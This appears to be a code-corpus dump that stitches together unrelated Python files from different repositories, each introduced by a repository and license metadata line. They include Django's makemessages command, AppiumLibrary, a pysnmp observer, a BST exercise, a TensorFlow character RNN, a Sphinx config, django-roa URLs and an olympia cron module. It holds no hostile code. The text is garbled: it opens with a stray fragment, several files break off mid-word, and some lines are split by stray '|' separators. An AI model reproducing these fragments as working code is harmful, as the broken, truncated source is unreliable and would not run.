def Wait(cls, key, timeout=None):
"""Wait for the process to complete.
We wait for all of the output to be written bef
| edmorley/django | django/core/management/commands/makemessages.py | Python | bsd-3-clause | 27,345 | 0.001682 |
import fnmatch
import glob
import os
import re
import sys
from functools import total_ordering
from itertools import dropwhile
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
find_command, handle_extensions, popen_wrapper,
)
from django.utils.encoding import DEFAULT_LOCALE_ENCODING
from django.utils.functional import cached_property
from django.utils.jslex import prepare_js_for_gettext
from django.utils.text import get_text_list
from django.utils.translation import templatize
plural_forms_re = re.compile(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', re.MULTILINE | re.DOTALL)
STATUS_OK = 0
NO_LOCALE_DIR = object()
def check_programs(*programs):
for program in programs:
if find_command(program) is None:
raise CommandError(
"Can't find %s. Make sure you have GNU gettext tools 0.15 or "
"newer installed." % program
)
@total_ordering
class TranslatableFile:
def __init__(self, dirpath, file_name, locale_dir):
self.file = file_name
self.dirpath = dirpath
self.locale_dir = locale_dir
def __repr__(self):
return "<%s: %s>" % (
self.__class__.__name__,
os.sep.join([self.dirpath, self.file]),
)
def __eq__(self, other):
return self.path == other.path
def __lt__(self, other):
return self.path < other.path
@property
def path(self):
return os.path.join(self.dirpath, self.file)
class BuildFile:
"""
Represent the state of a translatable file during the build process.
"""
def __init__(self, command, domain, translatable):
self.command = command
self.domain = domain
self.translatable = translatable
@cached_property
def is_templatized(self):
if self.domain == 'djangojs':
return self.command.gettext_version < (0, 18, 3)
elif self.domain == 'django':
file_ext = os.path.splitext(self.translatable.file)[1]
return file_ext != '.py'
return False
@cached_property
def path(self):
return self.translatable.path
@cached_property
def work_path(self):
"""
Path to a file which is being fed into GNU gettext pipeline. This may
be either a translatable or its preprocessed version.
"""
if not self.is_templatized:
return self.path
extension = {
'djangojs': 'c',
'django': 'py',
}.get(self.domain)
filename = '%s.%s' % (self.translatable.file, extension)
return os.path.join(self.translatable.dirpath, filename)
def preprocess(self):
"""
Preprocess (if necessary) a translatable file before passing it to
xgettext GNU gettext utility.
"""
if not self.is_templatized:
return
encoding = settings.FILE_CHARSET if self.command.settings_available else 'utf-8'
with open(self.path, 'r', encoding=encoding) as fp:
src_data = fp.read()
if self.domain == 'djangojs':
content = prepare_js_for_gettext(src_data)
elif self.domain == 'django':
content = templatize(src_data, origin=self.path[2:])
with open(self.work_path, 'w', encoding='utf-8') as fp:
fp.write(content)
def postprocess_messages(self, msgs):
"""
Postprocess messages generated by xgettext GNU gettext utility.
Transform paths as if these messages were generated from original
translatable files rather than from preprocessed versions.
"""
if not self.is_templatized:
return msgs
# Remove '.py' suffix
if os.name == 'nt':
# Preserve '.\' prefix on Windows to respect gettext behavior
old_path = self.work_path
new_path = self.path
else:
old_path = self.work_path[2:]
new_path = self.path[2:]
return re.sub(
r'^(#: .*)(' + re.escape(old_path) + r')',
lambda match: match.group().replace(old_path, new_path),
msgs,
flags=re.MULTILINE
)
def cleanup(self):
"""
Remove a preprocessed copy of a translatable file (if any).
"""
if self.is_templatized:
# This check is needed for the case of a symlinked file and its
# source being processed inside a single group (locale dir);
# removing either of those two removes both.
if os.path.exists(self.work_path):
os.unlink(self.work_path)
def normalize_eols(raw_contents):
"""
Take a block of raw text that will be passed through str.splitlines() to
get universal newlines treatment.
Return the resulting block of text with normalized `\n` EOL sequences ready
to be written to disk using current platform's native EOLs.
"""
lines_list = raw_contents.splitlines()
# Ensure last line has its EOL
if lines_list and lines_list[-1]:
lines_list.append('')
return '\n'.join(lines_list)
def write_pot_file(potfile, msgs):
"""
Write the `potfile` with the `msgs` contents, making sure its format is
valid.
"""
pot_lines = msgs.splitlines()
if os.path.exists(potfile):
# Strip the header
lines = dropwhile(len, pot_lines)
else:
lines = []
found, header_read = False, False
for line in pot_lines:
if not found and not header_read:
found = True
line = line.replace('charset=CHARSET', 'charset=UTF-8')
if not line and not found:
header_read = True
lines.append(line)
msgs = '\n'.join(lines)
with open(potfile, 'a', encoding='utf-8') as fp:
fp.write(msgs)
class Command(BaseCommand):
help = (
"Runs over the entire source tree of the current directory and "
"pulls out all strings marked for translation. It creates (or updates) a message "
"file in the conf/locale (in the django tree) or locale (for projects and "
"applications) directory.\n\nYou must run this command with one of either the "
"--locale, --exclude, or --all options."
)
translatable_file_class = TranslatableFile
build_file_class = BuildFile
requires_system_checks = False
leave_locale_alone = True
msgmerge_options = ['-q', '--previous']
msguniq_options = ['--to-code=utf-8']
msgattrib_options = ['--no-obsolete']
xgettext_options = ['--from-code=UTF-8', '--add-comments=Translators']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', default=[], dest='locale', action='append',
help='Creates or updates the message files for the given locale(s) (e.g. pt_BR). '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', default=[], dest='exclude', action='append',
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--domain', '-d', default='django', dest='domain',
help='The domain of the message files (default: "django").',
)
parser.add_argument(
'--all', '-a', action='store_true', dest='all',
help='Updates the message files for all existing locales.',
)
parser.add_argument(
'--extension', '-e', dest='extensions', action='append',
help='The file extension(s) to examine (default: "html,txt,py", or "js" '
'if the domain is "djangojs"). Separate multiple extensions with '
'commas, or use -e multiple times.',
)
parser.add_argument(
'--symlinks', '-s', action='store_true', dest='symlinks',
help='Follows symlinks to directories when exam
| jollychang/robotframework-appiumlibrary | AppiumLibrary/__init__.py | Python | apache-2.0 | 5,544 | 0.004509 |
# -*- coding: utf-8 -*-
import os
from AppiumLibrary.keywords import *
from AppiumLibrary.version import VERSION
__version__ = VERSION
class AppiumLibrary(
_LoggingKeywords,
_RunOnFailureKeywords,
_ElementKeywords,
_ScreenshotKeywords,
_ApplicationManagementKeywords,
_WaitingKeywords,
_TouchKeywords,
_KeyeventKeywords,
_AndroidUtilsKeywords,
_ScreenrecordKeywords
):
"""AppiumLibrary is a Mobile App testing library for Robot Framework.
= Locating or specifying elements =
All keywords in AppiumLibrary that need to find an element on the page
take an argument, either a ``locator`` or a ``webelement``. ``locator``
is a string that describes how to locate an element using a syntax
specifying different location strategies. ``webelement`` is a variable that
holds a WebElement instance, which is a representation of the element.
== Using locators ==
By default, when a locator is provided, it is matched against the key attributes
of the particular element type. For iOS and Android, key attribute is ``id`` for
all elements and locating elements is easy using just the ``id``. For example:
| Click Element id=my_element
New in AppiumLibrary 1.4, ``id`` and ``xpath`` are not required to be specified,
however ``xpath`` should start with ``//`` else just use ``xpath`` locator as explained below.
For example:
| Click Element my_element
| Wait Until Page Contains Element //*[@type="android.widget.EditText"]
Appium additionally supports some of the [https://w3c.github.io/webdriver/webdriver-spec.html|Mobile JSON Wire Protocol] locator strategies.
It is also possible to specify the approach AppiumLibrary should take
to find an element by specifying a lookup strategy with a locator
prefix. Supported strategies are:
| *Strategy* | *Example* | *Description* | *Note* |
| identifier | Click Element `|` identifier=my_element | Matches by @id attribute | |
| id | Click Element `|` id=my_element | Matches by @resource-id attribute | |
| accessibility_id | Click Element `|` accessibility_id=button3 | Accessibility options utilize. | |
| xpath | Click Element `|` xpath=//UIATableView/UIATableCell/UIAButton | Matches with arbitrary XPath | |
| class | Click Element `|` class=UIAPickerWheel | Matches by class | |
| android | Click Element `|` android=UiSelector().description('Apps') | Matches by Android UI Automator | |
| ios | Click Element `|` ios=.buttons().withName('Apps') | Matches by iOS UI Automation | |
| nsp | Click Element `|` nsp=name=="login" | Matches by iOSNsPredicate | Check PR: #196 |
| chain | Click Element `|` chain=XCUIElementTypeWindow[1]/* | Matches by iOS Class Chain | |
| css | Click Element `|` css=.green_button | Matches by css in webview | |
| name | Click Element `|` name=my_element | Matches by @name attribute | *Only valid* for Selendroid |
== Using webelements ==
Starting with version 1.4 of the AppiumLibrary, one can pass an argument
that contains a WebElement instead of a string locator. To get a WebElement,
use the new `Get WebElements` or `Get WebElement` keyword.
For example:
| @{elements} Get Webelements class=UIAButton
| Click Element @{elements}[2]
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
ROBOT_LIBRARY_VERSION = VERSION
def __init__(self, timeout=5, run_on_failure='Capture Page Screenshot'):
"""AppiumLibrary can be imported with optional arguments.
``timeout`` is the default timeout used to wait for all waiting actions.
It can be later set with `Set Appium Timeout`.
``run_on_failure`` specifies the name of a keyword (from any available
libraries) to execute when a AppiumLibrary keyword fails.
By default `Capture Page Screenshot` will be used to take a screenshot of the current page.
Using the value `No Operation` will disable this feature altogether. See
`Register Keyword To Run On Failure` keyword for more information about this
functionality.
Examples:
| Library | AppiumLibrary | 10 | # Sets default timeout to 10 seconds |
| Library | AppiumLibrary | timeout=10 | run_on_failure=No Operation | # Sets default timeout to 10 seconds and does nothing on failure |
"""
for base in AppiumLibrary.__bases__:
base.__init__(self)
self.set_appium_timeout(timeout)
self.register_keyword_to_run_on_failure(run_on_failure)
| etingof/pysnmp | pysnmp/entity/observer.py | Python | bsd-2-clause | 2,572 | 0.000778 |
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2019, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysnmp/license.html
#
from pysnmp import error
class MetaObserver(object):
"""This is a simple facility for exposing internal SNMP Engine
working details to pysnmp applications. These details are
basically local scope variables at a fixed point of execution.
Two modes of operations are offered:
1. Consumer: app can request an execution point context by execution point ID.
2. Provider: app can register its callback function (and context) to be invoked
once execution reaches specified point. All local scope variables
will be passed to the callback as in #1.
It's important to realize that execution context is only guaranteed
to exist to functions that are at the same or deeper level of invocation
relative to execution point specified.
"""
def __init__(self):
self.__observers = {}
self.__contexts = {}
self.__execpoints = {}
def registerObserver(self, cbFun, *execpoints, **kwargs):
if cbFun in self.__contexts:
raise error.PySnmpError('duplicate observer %s' % cbFun)
else:
self.__contexts[cbFun] = kwargs.get('cbCtx')
for execpoint in execpoints:
if execpoint not in self.__observers:
self.__observers[execpoint] = []
self.__observers[execpoint].append(cbFun)
def unregisterObserver(self, cbFun=None):
if cbFun is None:
self.__observers.clear()
self.__contexts.clear()
else:
for execpoint in dict(self.__observers):
if cbFun in self.__observers[execpoint]:
self.__observers[execpoint].remove(cbFun)
if not self.__observers[execpoint]:
del self.__observers[execpoint]
def storeExecutionContext(self, snmpEngine, execpoint, variables):
self.__execpoints[execpoint] = variables
if execpoint in self.__observers:
for cbFun in self.__observers[execpoint]:
cbFun(snmpEngine, execpoint, variables, self.__contexts[cbFun])
def clearExecutionContext(self, snmpEngine, *execpoints):
if execpoints:
for execpoint in execpoints:
del self.__execpoints[execpoint]
else:
self.__execpoints.clear()
def getExecutionContext(self, execpoint):
return self.__execpoints[execpoint]
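# Illustrative sketch of the "provider" mode described in the class docstring
# (the engine setup and execution-point name are assumptions, not taken from
# this file; an SnmpEngine exposes a MetaObserver as its .observer attribute):
from pysnmp.entity import engine

def print_execpoint(snmpEngine, execpoint, variables, cbCtx):
    print('reached %s with variables %r' % (execpoint, variables))

snmpEngine = engine.SnmpEngine()
snmpEngine.observer.registerObserver(
    print_execpoint, 'rfc3412.receiveMessage:request', cbCtx=None)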
| RishiRamraj/interviews | solutions/algorithms/bst.py | Python | mit | 667 | 0.004498 |
'''
Problem:
Find the kth smallest element in a bst without using static/global variables.
'''
def find(node, k, items=0):
# Base case.
if not node:
return items, None
# Decode the node.
left, value, right = node
# Check left.
index, result = find(left, k, items)
# Exit early.
if result:
return index, result
# Check this node.
next = index + 1
if next == k:
return next, value
# Check the right.
return find(right, k, next)
test = (((None, 1, None), 2, (None, 3, None)), 4, ((None, 5, None), 5, (None, 6, None)))
#test = ((None, 1, None), 2, (None, 3, None))
print(find(test, 11))
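# Note (added commentary): find() returns an (index, value) pair; because the
# tree above holds only 7 values, the call with k=11 yields (7, None), while
# e.g. find(test, 3) yields (3, 3).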
| laurentb/weboob | modules/ensap/__init__.py | Python | lgpl-3.0 | 885 | 0 |
# -*- coding: utf-8 -*-
# Copyright(C) 2017 Juliette Fourcot
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from .module import EnsapModule
__all__ = ['EnsapModule']
| jaekookang/useful_bits | Machine_Learning/RNN_LSTM/predict_character/rnn_char_windowing.py | Python | mit | 7,262 | 0.006063 |
# coding: utf-8
# # Simple Character-level Language Model using vanilla RNN
# 2017-04-21 jkang
# Python3.5
# TensorFlow1.0.1
#
# - Different window sizes were applied, e.g. n_window = 3 (three-character window)
# - input: 'hello_world_good_morning_see_you_hello_grea'
# - output: 'ello_world_good_morning_see_you_hello_great'
#
# ### Reference:
# - https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py
# - https://github.com/aymericdamien/TensorFlow-Examples
# - https://hunkim.github.io/ml/
#
# ### Comment:
# - Training is done at the character level, not the word level
# - Only a single example is used for training
#   : that one example is windowed to produce multiple samples (each new sample has length window_size)
# - The cell type is BasicRNNCell (see the first Reference)
# - dynamic_rnn is used (said to be more time/compute efficient than the older tf.nn.rnn)
# - AdamOptimizer is used
# In[1]:
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import random
# Input/Ouput data
char_raw = 'hello_world_good_morning_see_you_hello_great'
char_list = sorted(list(set(char_raw)))
char_to_idx = {c: i for i, c in enumerate(char_list)}
idx_to_char = {i: c for i, c in enumerate(char_list)}
char_data = [char_to_idx[c] for c in char_raw]
char_data_one_hot = tf.one_hot(char_data, depth=len(
char_list), on_value=1., off_value=0., axis=1, dtype=tf.float32)
char_input = char_data_one_hot[:-1, :] # 'hello_world_good_morning_see_you_hello_grea'
char_output = char_data_one_hot[1:, :] # 'ello_world_good_morning_see_you_hello_great'
with tf.Session() as sess:
char_input = char_input.eval()
char_output = char_output.eval()
# In[2]:
# Learning parameters
learning_rate = 0.001
max_iter = 1000
# Network Parameters
n_input_dim = char_input.shape[1]
n_input_len = char_input.shape[0]
n_output_dim = char_output.shape[1]
n_output_len = char_output.shape[0]
n_hidden = 100
n_window = 2 # number of characters in one window (like a mini-batch)
# TensorFlow graph
# (batch_size) x (time_step) x (input_dimension)
x_data = tf.placeholder(tf.float32, [None, None, n_input_dim])
# (batch_size) x (time_step) x (output_dimension)
y_data = tf.placeholder(tf.float32, [None, None, n_output_dim])
# Parameters
weights = {
'out': tf.Variable(tf.truncated_normal([n_hidden, n_output_dim]))
}
biases = {
'out': tf.Variable(tf.truncated_normal([n_output_dim]))
}
# In[3]:
def make_window_batch(x, y, window_size):
'''
This function will generate samples based on window_size from (x, y)
Although (x, y) is one example, it will create multiple examples with the length of window_size
x: (time_step) x (input_dim)
y: (time_step) x (output_dim)
x_out: (total_batch) x (batch_size) x (window_size) x (input_dim)
y_out: (total_batch) x (batch_size) x (window_size) x (output_dim)
total_batch x batch_size <= examples
'''
# (batch_size) x (window_size) x (dim)
# n_examples is calculated by sliding one character with window_size
n_examples = x.shape[0] - window_size + 1 # n_examples = batch_size
x_batch = np.empty((n_examples, window_size, x.shape[1]))
y_batch = np.empty((n_examples, window_size, y.shape[1]))
for i in range(n_examples):
x_batch[i, :, :] = x[i:i + window_size, :]
y_batch[i, :, :] = y[i:i + window_size, :]
z = list(zip(x_batch, y_batch))
random.shuffle(z)
x_batch, y_batch = zip(*z)
x_batch = np.array(x_batch)
y_batch = np.array(y_batch)
# (total_batch) x (batch_size) x (window_size) x (dim)
# total_batch is set to 1 (no mini-batch)
x_new = x_batch.reshape((n_examples, window_size, x_batch.shape[2]))
y_new = y_batch.reshape((n_examples, window_size, y_batch.shape[2]))
return x_new, y_new, n_examples
# In[4]:
def RNN(x, weights, biases):
cell = tf.contrib.rnn.BasicRNNCell(n_hidden) # Make RNNCell
outputs, states = tf.nn.dynamic_rnn(cell, x, time_major=False, dtype=tf.float32)
'''
**Notes on tf.nn.dynamic_rnn**
- 'x' can have shape (batch)x(time)x(input_dim), if time_major=False or
(time)x(batch)x(input_dim), if time_major=True
- 'outputs' can have the same shape as 'x'
(batch)x(time)x(input_dim), if time_major=False or
(time)x(batch)x(input_dim), if time_major=True
- 'states' is the final state, determined by batch and hidden_dim
'''
# outputs[-1] is outputs for the last example in the mini-batch
return tf.matmul(outputs[-1], weights['out']) + biases['out']
def softmax(x):
rowmax = np.max(x, axis=1)
x -= rowmax.reshape((x.shape[0] ,1)) # for numerical stability
x = np.exp(x)
sum_x = np.sum(x, axis=1).reshape((x.shape[0],1))
return x / sum_x
pred = RNN(x_data, weights, biases)
cost = tf.reduce_mean(tf.squared_difference(pred, y_data))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# In[5]:
# Learning
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(max_iter):
loss = 0
x_batch, y_batch, n_examples = make_window_batch(char_input, char_output, n_window)
for ibatch in range(x_batch.shape[0]):
x_train = x_batch[ibatch, :, :].reshape((1,-1,n_input_dim))
y_train = y_batch[ibatch, :, :].reshape((1,-1,n_output_dim))
x_test = char_input.reshape((1, n_input_len, n_input_dim))
y_test = char_output.reshape((1, n_input_len, n_input_dim))
c, _ = sess.run([cost, optimizer], feed_dict={
x_data: x_train, y_data: y_train})
p = sess.run(pred, feed_dict={x_data: x_test, y_data: y_test})
loss += c
mean_mse = loss / n_examples
if i == (max_iter-1):
pred_act = softmax(p)
if (i+1) % 100 == 0:
pred_out = np.argmax(p, axis=1)
accuracy = np.sum(char_data[1:] == pred_out)/n_output_len*100
print('Epoch:{:>4}/{},'.format(i+1,max_iter),
'Cost:{:.4f},'.format(mean_mse),
'Acc:{:>.1f},'.format(accuracy),
'Predict:', ''.join([idx_to_char[i] for i in pred_out]))
# In[6]:
# Probability plot
fig, ax = plt.subplots()
fig.set_size_inches(15,20)
plt.title('Input Sequence', y=1.08, fontsize=20)
plt.xlabel('Probability of Next Character(y) Given Current One(x)'+
'\n[window_size={}, accuracy={:.1f}]'.format(n_window, accuracy),
fontsize=20, y=1.5)
plt.ylabel('Character List', fontsize=20)
plot = plt.imshow(pred_act.T, cmap=plt.get_cmap('plasma'))
fig.colorbar(plot, fraction=0.015, pad=0.04)
plt.xticks(np.arange(len(char_data)-1), list(char_raw)[:-1], fontsize=15)
plt.yticks(np.arange(len(char_list)), [idx_to_char[i] for i in range(len(char_list))], fontsize=15)
ax.xaxis.tick_top()
# Annotate
for i, idx in zip(range(len(pred_out)), pred_out):
annotation = idx_to_char[idx]
ax.annotate(annotation, xy=(i-0.2, idx+0.2), fontsize=12)
plt.show()
# f.savefig('result_' + idx + '.png')
| daviortega/bitk3 | docs/conf.py | Python | mit | 8,433 | 0.005336 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# bitk3 documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import bitk3
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'BIoinformatics ToolKit 3'
copyright = u"2016, Davi Ortega"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = bitk3.__version__
# The full version, including alpha/beta/rc tags.
release = bitk3.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bitk3doc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'bitk3.tex',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents,
|
if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = Fa
|
lse
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
[u'Davi Ortega'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega',
'bitk3',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no
|
ppokrovsky/pyvdp
|
demo/demo/urls.py
|
Python
|
mit
| 2,820
| 0.002837
|
from django.conf.urls import include, url
from demo.views import common
from demo.views.visadirect import fundstransfer, mvisa, reports, watchlist
from demo.views.pav import pav
from demo.views.dcas import cardinquiry
from demo.views.merchantsearch import search
from demo.views.paai.fundstransferattinq.cardattributes.fundstransferinquiry import funds_transfer_inquiry
from demo.views.paai.generalattinq.cardattributes.generalinquiry import general_inquiry
urlpatterns = [
url(r'^$', common.index),
# Payment Account Attributes Inquiry
url(r'^paai$', common.paai, name='paai'),
url(r'^paai/', include([
url(r'^fundstransferattinq/cardattributes/fundstransferinquiry$', funds_transfer_inquiry, name='paai_fti'),
url(r'^generalattinq/cardattributes/generalinquiry$', general_inquiry, name='paai_gi')
])),
# Merchant search
url(r'^merchantsearch$', common.merchantsearch, name='merchantsearch'),
url(r'^merchantsearch/', include([
url(r'^search$', search.merchant_search, name='merchantsearch_search'),
])),
# Payment account validation methods urls
url(r'^pav$', common.pav, name='pav'),
url(r'^pav/', include([
url(r'^cardvalidation$', pav.card_validation, name='pav_cardvalidation')
])),
# Digital card and account services
url(r'^dcas$', common.dcas, name='dcas'),
url(r'^dcas/', include([
url(r'^cardinquiry$', cardinquiry.debit_card_inquiry, name='dcas_debitcardinquiry')
])),
# VISA Direct methods urls
url(r'^visadirect$', common.visa_direct, name='vd'),
url(r'^visadirect/', include([
# FundsTransfer API
url(r'^fundstransfer$', fundstransfer.index, name='vd_ft'),
url(r'^fundstransfer/', include([
url(r'^pullfunds$', fundstransfer.pull, name='vd_ft_pullfunds'),
url(r'^pushfunds$', fundstransfer.push, name='vd_ft_pushfunds'),
url(r'^reversefunds$', fundstransfer.reverse, name='vd_ft_reversefunds'),
])),
# mVISA API
url(r'^mvisa$', mvisa.index, name='vd_mvisa'),
url(r'^mvisa/', include([
url(r'^cashinpushpayments$', mvisa.cipp, name='vd_mvisa_cipp'),
            url(r'^cashoutpushpayments$', mvisa.copp, name='vd_mvisa_copp'),
url(r'^merchantpushpayments$', mvisa.mpp, name='vd_mvisa_mpp'),
])),
# Reports API
url(r'^reports$', reports.index, name='vd_reports'),
url(r'^reports/', include([
url(r'^transactiondata$', reports.transactiondata, name='vd_reports_transactiondata'),
])),
# WatchList Inquiry methods urls
        url(r'^watchlist$', watchlist.index, name='vd_wl'),
url(r'^watchlist/', include([
url(r'^inquiry$', watchlist.inquiry, name='vd_wl_inquiry')
]))
])),
]
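# Illustrative note (added for clarity, not part of the original file): with these
# named patterns registered, views and templates can resolve the endpoints by name,
# e.g. (assuming a Django version that provides django.urls.reverse):
#   from django.urls import reverse
#   reverse('vd_ft_pullfunds')   # -> '/visadirect/fundstransfer/pullfunds'
#   reverse('paai_gi')           # -> '/paai/generalattinq/cardattributes/generalinquiry'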
|
snakeego/pyactors
|
tests/test_forked_green_actors.py
|
Python
|
bsd-2-clause
| 1,024
| 0.003906
|
import sys
if '' not in sys.path:
sys.path.append('')
import time
import unittest
from pyactors.logs import file_logger
from pyactors.exceptions import EmptyInboxException
from tests import ForkedGreActor as TestActor
from multiprocessing import Manager
class ForkedGreenletActorTest(unittest.TestCase):
def test_run(self):
''' test_forked_green_actors.test_run
'''
test_name = 'test_forked_gen_actors.test_run'
logger = file_logger(test_name, filename='logs/%s.log' % test_name)
actor = TestActor()
        actor.start()
while actor.processing:
time.sleep(0.1)
actor.stop()
result = []
while True:
try:
result.append(actor.inbox.get())
except EmptyInboxException:
break
self.assertEqual(len(result), 10)
        self.assertEqual(actor.processing, False)
self.assertEqual(actor.waiting, False)
if __name__ == '__main__':
unittest.main()
|
charles-vdulac/django-roa
|
examples/django_roa_client/forms.py
|
Python
|
bsd-3-clause
| 432
| 0.002315
|
from django import forms
from django_roa_client.models import RemotePage, RemotePageWithRelations
class TestForm(forms.Form):
    test_field = forms.CharField()
remote_page = forms.ModelChoiceField(queryset=RemotePage.objects.all())
class RemotePageForm(forms.ModelForm):
class Meta:
model = RemotePage
class RemotePageWithRelationsForm(forms.ModelForm):
class Meta:
model = RemotePageWithRelations
|
mozilla/olympia
|
src/olympia/amo/cron.py
|
Python
|
bsd-3-clause
| 3,247
| 0.000924
|
from datetime import datetime, timedelta
from django.core.files.storage import default_storage as storage
import olympia.core.logger
from olympia import amo
from olympia.activity.models import ActivityLog
from olympia.addons.models import Addon
from olympia.addons.tasks import delete_addons
from olympia.amo.utils import chunked
from olympia.files.models import FileUpload
from olympia.scanners.models import ScannerResult
from olympia.amo.models import FakeEmail
from . import tasks
from .sitemap import (
get_sitemap_path,
get_sitemaps,
get_sitemap_section_pages,
render_index_xml,
)
log = olympia.core.logger.getLogger('z.cron')
def gc(test_result=True):
"""Site-wide garbage collections."""
def days_ago(days):
return datetime.today() - timedelta(days=days)
log.info('Collecting data to delete')
logs = (
